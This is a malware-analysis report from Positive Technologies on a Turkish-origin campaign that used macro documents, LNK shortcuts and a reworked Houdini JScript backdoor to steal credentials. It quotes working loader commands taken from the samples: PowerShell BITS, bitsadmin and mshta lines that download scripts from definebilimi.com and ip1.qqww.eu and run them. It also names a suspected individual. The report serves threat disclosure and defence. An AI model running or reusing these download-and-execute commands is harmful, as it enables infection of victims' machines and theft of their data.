The Positive Technologies Expert Security Center has detected a malicious campaign active since at least mid-January 2018. The operation most focused on users from Brazil, Germany, Hungary, Latvia, the Philippines, Turkey, United Kingdom, and the USA. The long operation included use of a number of tools and techniques for infecting and controlling victim PCs. Here we will detail the stages of infection, utilities and network infrastructure used, and the digital traces that put us on the spot as the alleged hacker.
- Attackers reworked and modernized a 10-year-old worm
- Unusual set of tools and extensive network infrastructure
- The main suspect is a Turkish freelancer
On April 5, 2019, as part of tracking new threats, specialists at the PT Expert Security Center investigated a suspicious Microsoft Office document. The file had the .docm extension (modern Microsoft Word format with support for macros). We also know that it:
- Was created several days prior to detection (2019-03-31)
- Contained an image asking the user to enable macros
- Was created on a Turkish-language system (as indicated by values of metadata fields: “Konu Başlığı” / “Subject Heading” and “Konu Ba l , 1” / “Thread Title, 1″—as translated by Google Translate)
|Figure 1. Typical message for tricking victims into enabling macros|
The macro code is slightly obfuscated but compact. It uses a Background Intelligent Transfer Management (BITS) PowerShell cmdlet to download and run a JScript script from the attacker’s server:
Shell (“pow” & “ershe” & “ll -comm” & “and “”$h1=’e’;&(‘i’ + $h1 + ‘x’)(‘Import-Module BitsTransfer;Start-BitsTransf’ + $h1 + ‘r https://definebilimi.com/1/b12.js $env:t’ + $h1 + ‘mpbb1.js;’);Start-Process -WindowStyle hidden -FilePath ‘cmd.exe’ -ArgumentList ‘/c %systemroot%system32wscript %temp%bb1.js'”””)
The reason for use of PowerShell as well as the unusual module for downloading files from the web server is to evade restrictions on opening and running untrusted programs.
There are some similar documents. One of them is a .doc file (old Microsoft Word format) with Turkish character code page. The macro works in a very similar way:
Shell “cmd.exe /c bitsadmin /transfer myjob /download /priority FOREGROUND https://definebilimi.com/up3e.js %temp%o2.js & wscript.exe %temp%o2.js”, vbHide
Here the malware author is using the same BITS technique, but now with the help of the legitimate system utility bitsadmin. Note that both the document’s creation date and the time of its detection on public sources point to the middle of July 2018. So the attacks have been in progress for around a year, at a minimum. The payload is downloaded from the same attacker server, and the approach to naming the JScript script is similar too.
A different document has the extension .rtf (Rich Text Format). The file has several embedded .xls (old Microsoft Excel format) documents with identical contents. The macro code is completely identical to that from the first document. This, as well as the identical values of the code page and HeadingPairs XML field, suggests a common author.
Not only Office documents were used for initial infection. We found a few malicious .lnk (Windows Shell Link) files that, when run, triggered execution of the following command:
C:WindowsSystem32cmd.exe /c powershell -command “$h1=’e’;&(‘i’ + $h1 + ‘x’)(‘Import-Module BitsTransfer;Start-BitsTransf’ + $h1 + ‘r https://definebilimi.com/1/b12.js $env:t’ + $h1 + ‘mpbb.js;’)” & %systemroot%system32wscript %temp%bb.js
The shortcuts were distributed during mid-March and late April 2019.
Their metadata contains the username win7-bilgisayar (in translation from Turkish: “win7-computer”), indicating the user of the system on which the shortcuts were created.
We can state with confidence that phishing emails were the most likely method used for delivering malicious files for initial infection.
The metamorphoses of Houdini
Minor differences aside, all the objects for the initial infection stage download and run the same JScript script. The file is not obfuscated or packed. The only step taken to confound analysis was use of random variable names. The script is a WSH backdoor with the following properties:
- The C2 address and port are hard-coded.
- C2 is performed via HTTP POST requests.
- When the script starts, the string “is-bekle” (in translation from Turkish: “is-ready”) is inserted in the URI field.
- The User-Agent field contains brief information about the system with a script-defined delineator (in this case, “<|>”):
- Hard disk serial number
- System version
- Script name
- Antivirus software name
- Value of the %ProgramData% environment variable
- Whether .NET Framework 4.5.2 is installed
- Wait time between requests
- Whether Java is installed
- It checks whether it is running in a Kaspersky Lab sandbox based on the hard disk serial number. If the number is a match, the script stops running.
- It gets and runs server commands, which include:
- Downloading a file from the server
- Uploading a file to the server
- Stealing the clipboard contents
- Stealing contents of a folder
- Getting information on current processes
- Running commands (cmd.exe)
- Taking and sending screenshots
- Extracting and sending stored Chrome and Opera passwords
|Figure 2. Beginning of the JScript script downloaded from the attacker server|
Based on the comments, code structure, command names, and format for gathering system information, we find parallels with the well-known Houdini VBS worm. In 2013, researchers at FireEye picked apart the functions of Houdini, which handles commands and collects information in a similar way. It would seem that in our case, the attacker borrowed from the well-known worm, rewrote its functions in JScript instead of VBScript, and replaced some English strings with Turkish ones for his convenience.
|Figure 3. Handling of JScript backdoor commands|
The strings passing the results of command execution contain “Bcorp” in their name. This same combination of letters is present in the name of the C2 server: ip1[.]bcorp.fun.
According to Shodan as of April 30, 2019, the attacker’s host was running an AppServ web server. The server was not locked down very well: for example, the phpinfo page (which displays configuration information of interest) was accessible. Analysis of the URLs used to download malware showed that the server has a public directory (./a) listing the attacker’s other tools.
|Figure 4. Home page of the attacker’s server|
|Figure 5. phpinfo page on the attacker’s server|
|Figure 6. Contents of publicly available directory on the attacker’s server as of late April 2019|
|Figure 7. Contents of publicly available directory on the attacker’s server as of late May 2019|
Here are descriptions of some of the files we found.
Most of all, we found a large number of variations on the modified Houdini worm we just looked at. Changes in the script from version to version were small: changes in host names (husan2.ddns.net, ip1.bcorp.fun, ip1.qqww.eu), ports (86, 87), and variable names. Particular commands appeared or disappeared. One version was even embedded in a JScript scriptlet.
|Figure 8. Houdini JScript in scriptlet form|
This independently created lightweight backdoor, written in Java, uses TCP port 22122 for C2. Capabilities include:
- Running commands in cmd.exe
- Determining the OS version
- Listing catalogs
- Uploading files
- Adding itself to the startup items folder and autostart registry key
This appears to be why the modified worm checks for the presence of Java on the system. But it is not clear why an additional backdoor would be needed if the first one has a wide range of functions.
This PowerShell wrapper extracts browsing history, usernames, passwords, and cookies from Google Chrome. Some versions contain the library System.Data.SQLite.dll for x86 and x64 systems in base64 encoding; the other versions assume that the library will be present in the %APPDATA% folder. Provided as a plugin component for the main JScript backdoor.
This PowerShell implementation of a simple container is also provided as a plugin component for the main JScript backdoor.
|Figure 9. Code fragment from the PowerShell keylogger|
This utility from Nirsoft grabs usernames and passwords from popular browsers. The attackers used a specially tweaked version, having packed it with ASPack to complicate analysis or bypass signature detection.
This publicly available commercial remote administration tool is used by a number of cybercrime groups. In this case, obfuscation was accomplished by packing the RAT in a .NET PE file and applying DeepSea 4.1.
This bare-bones GUI utility from AllScoop is used to test router and firewall settings. For each listener port it displays a string and ends the connection.
|Figure 10. TCP Listen GUI|
This tool is similar to the ones described already. When run, it performs the following command:
C:WindowsSystem32cmd.exe /v /c “set i=h&&ms!i!ta http://ip1.qqww.eu/1/f.htm”
In this case the shortcut was created under another user (desktop-amkd3n3).
We have put all the loaders for the already-mentioned RATs in this group. They are all small (less than 1 KB each) and in various formats (such as .htm, .xsl, and .hta). They are written in various languages, both of the scripting variety (JScript, PowerShell) and compiled-on-the-fly (C#). Here are code fragments from a few samples:
|Figure 11. Fragment of the .htm loader|
|Figure 12. Fragment of the .xsl loader|
|Figure 13. Fragment of the .ps1 loader|
Tiny PE loaders
Besides script loaders, we also found .NET PE files. These files, too, were small (up to 10 KB) but with similarly extensive functionality:
|Figure 14. Sample of decompiled code from one of the PE loaders|
An open-source remote administration tool. Many versions and modifications are available publicly. Written in C# with partial obfuscation.
Bcorp panel and builder
Server-side component of the JScript backdoor. It also serves as the builder for the client side. A .NET PE, the component is not obfuscated or packed. The interface resembles that of a tweaked Houdini server. It can send commands plus additional components and plugins to an infected machine: Java environment, PowerShell scripts and Nirsoft utility to grab browser data, PowerShell keylogger scripts, and others. Note that the project is named BcorpRat, as can be seen in the title bar of the window in the following screenshot. The namespace of the source code contains “Btech” in its name—remember this detail for later.
|Figure 15. JScript backdoor admin panel: main window|
|Figure 16. JScript backdoor admin panel: client-side builder window|
Now we will pay a closer look at the addresses used for interaction with the attacker’s malware. We will start with the domain definebilimi.com, with which the Office documents and LNK loaders communicate.
The domain changed owners on January 16, 2018. (Incidentally, “define bilimi” means “treasure of science” in Turkish.) Below are some of the most interesting WHOIS tidbits from that time.
|Registrant Name||Koray YAMAN|
It would be hasty to take this information at face value, of course. The indicated country and the frequency of occurrence of traces of the Turkish language in the code allow us to assume that these coincidences are not accidental. And the email address contains “btech,” which is a bit of a recurring theme.
The history of NS servers for the domain is interesting:
The hosts buhar.biz and qqww.eu have already been encountered in malware.
The history of this domain (“buhar” means “steam” in Turkish) starts on January 16, 2018, the same day as definebilimi.com.
|Registrant Name||balta zar|
The situation is similar: most of the data looks fake, other than the email address (“buharcin” is Turkish for “steamer”).
Registered on March 23, 2019. The registration country is (yet again) Turkey and the client organization is “Bcorp.” Not to mention that we see “bcorp” in the name of the domain itself—a string that should look familiar by now.
The attacker used at least one unconventional way to handle hosting. Starting in mid-March 2019, we were able to record use of dynamic DNS servers. Such servers enable attackers to hide their IP addresses and keep their C2 alive for longer. The choice of names was somewhat predictable: a few months later we detected use of husan3.ddns.net, while husan.ddns.net was active as far back as April 2017.
Starting in early April, the hacker registered domains with anonymization from WhoisGuard, Inc., which is located in Panama. Some examples include bkorp.xyz, prntsrcn.com, and i37-imgur.com. The NS servers used link these domains to the other malicious ones.
This domain—like bcorp.fun—has the subdomain ip1. The registrant (Osbil Technology Ltd.) is supposedly located in Berlin. In reality, a company with the same name is located on the east coast of Cyprus in the city of Famagusta, in the partially recognized Turkish Republic of Northern Cyprus. The company’s official site is hosted on a domain that acted as NS server for bcorp.fun from March to May 2019. We did not find any signs of compromise of the name servers. Because of the NS provider’s configuration (with the provider’s information replacing the client’s in the registrant field) client information was hidden from public view.
|Figure 17. Information about the registrant (owner) of qqww.eu|
For a fuller picture, we will give IP addresses with some of the domains corresponding to them at various points in time:
On the trail of the hacker
Among the malicious tools and utilities found on the attacker’s server, we uncovered a curious image:
|Figure 18. Image file found on the attacker’s web server|
We have not reduced the image size. The image is included here with the exact same dimensions as on the server.
Despite the poor image quality, we were able to establish that this is a screenshot of a transaction page on blockr.io. This was a dead end, but we started to look for any associations with the name of the image file (IMG_JPEG-0371e4dce3c8804f1543c3f0f309cc11.jpg). We uncovered an online scan result for a file that had the same name as the image. The analyzed object was a Windows shortcut similar to the ones discussed previously. Attached was an image containing the photo ID card of a Turkish citizen. The last name on the card (Yaman) matches one found repeatedly in the domain registration records.
|Figure 19. ID card found with LNK loader|
Scanning of the shortcut in the online sandbox was triggered not by a user uploading a file, but by accessing the following target URL:
The user’s Github account is now blocked, but based on the URL we can deduce the user’s handle (btechim) and the name of the project (prntsrcn). The project name matches the name of one of the domains used in the campaign (prntsrcn.com). The user handle contains “btech,” which we saw in the software for the admin panels described already.
Searching for this same handle put us onto a freelancer hiring site. There we find a page for a freelancer in Turkey who has the same handle, along with confirmed phone number, mailing address, and Facebook profile. He is offering his services in the area of software development and cybersecurity.
|Figure 20. The suspected attacker’s page on a freelancer hiring site|
Positive Technologies tracked this malicious campaign of Turkish origin for several months. It is rare to see a single series of attacks combining both modern techniques and modified 10-year-old tools. The attacker employed a wide range of tools of diverse purpose, platform, and sophistication to obtain total control over victim PCs. He used a wide range of techniques to hide his identity when establishing network infrastructure. But it was not possible to account for everything—and so pride and a few slipups ultimately gave away the game. The research was sent to the Turkish Information Security Incident Response Center.
Author: Alexey Vishnyakov, Positive Technologies
Tiny PE loaders
Bcorp panel and builder